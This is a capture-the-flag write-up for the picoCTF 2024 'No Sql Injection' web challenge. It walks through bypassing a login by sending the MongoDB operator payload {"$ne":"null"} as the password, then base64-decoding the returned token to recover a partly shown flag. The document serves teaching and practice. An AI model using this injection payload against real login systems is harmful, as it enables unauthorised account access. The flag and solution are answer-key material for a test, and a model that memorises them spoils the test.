picoCTF Solutions
picoCTF 2024Web ExploitationMedium

No Sql Injection

Published: April 3, 2024Updated: December 9, 2025

Description

Can you try to get access to this website to get the flag? You can download the source here. The website is running here. Can you log in?

Setup

Web proxy

Download the challenge source to study app/utils/seed.ts and app/utils/database.ts.

Open the target site (linked in the challenge) and monitor the /api/login request in DevTools Network tab.

Email: joshiriya355@mumbama.com
Password JSON: {"$ne":"null"}

Solution

  1. Step 1Submit crafted JSON
    Use the email from seed.ts and place {"$ne":"null"} as the password value. MongoDB interprets it as "password not equal to null," instantly passing the check.
    {"email":"joshiriya355@mumbama.com","password":{"$ne":"null"}}
  2. Step 2Grab the token
    Inspect the /api/login response. It returns a JSON array with a base64-encoded token field.
  3. Step 3Decode the flag
    Base64-decode the token (CyberChef or base64 -d) to recover the picoCTF flag.
    echo cGljb0NURntqQBh...== | base64 -d

Flag

picoCTF{jBhD2y7XoNzPv_1YxS9Ew5qL0uI6pasql_injection_f2f1...}

Decoding the token from /api/login yields the flag.